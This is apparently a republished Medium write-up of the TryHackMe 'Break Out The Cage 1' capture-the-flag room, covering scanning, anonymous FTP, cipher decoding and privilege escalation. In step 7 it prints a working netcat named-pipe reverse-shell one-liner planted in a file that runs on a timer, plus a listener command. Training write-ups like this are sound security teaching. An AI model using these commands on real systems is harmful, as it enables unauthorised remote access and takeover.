TryHackMe: Break Out The Cage 1 Write-up

InfoSec Write-ups – Medium–

Easy level CTF Challenge

No need to wait; connect to your OpenVPN network and join the room.

Task 1 Investigate!

  1. After deploying the machine, you will get your machine IP in one min. Let us start by scanning the machine through Nmap.
nmap -sV -sC -A <machine_ip>
Nmap Scan results

2. Let’s search for hidden extensions in HTTP through Gobuster Tool.

gobuster dir -u http://<machine_ip> -w <wordlist>
Gobuster scan results

3. Since nothing can be found in the HTTP server, let us open the FTP server and login as anonymous.

ftp server

4. We can see a file called “dad_tasks” with a string that looks encoded. After many different tries, I was able to decode the string using CyberChef. First, with base64 and then with Vigenere cipher. Then finally, we will get Weston’s password.

weston’s password

5. Successfully we got the shell as weston.

6. There is a Dotfile in /opt directory, which suspicious. Let’s check that

7. At a specific time interval, we get a few messages from cage. And those quotes are stored in the .quotes file. We can remove all those quotes and add a reverse shell script to it.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <system_ip> 1234 >/tmp/f' > .quotes

8. Simultaneously we have to listen through Netcat in one more terminal.

nc -lvp 1234

Successfully we got the reverse shell, and the user is cage.

9. ‘Super_Duper_Checklist’ contains the user flag.

user flag

10. In the ‘email_backup’ folder, there are three emails. The third email gives us a note which looks encrypted.

11. The encrypted message can be decoded in CyberChef through Vignenere Decode. The key is ‘face’ because, in that email, it was highlighted. After cracking, we will get the password for root.

12. Changing the user to root.

su root
root user

13. The root directory contains two email backups in it. The second email contains the root flag.

root flag

Boom!!! We have completed the room.

It was fun doing this challenge. I hope everyone learned something new:).

Get connected with me through Linkedin and My Website.

TryHackMe: Break Out The Cage 1 Write-up was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

View original article on InfoSec Write-ups – Medium

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s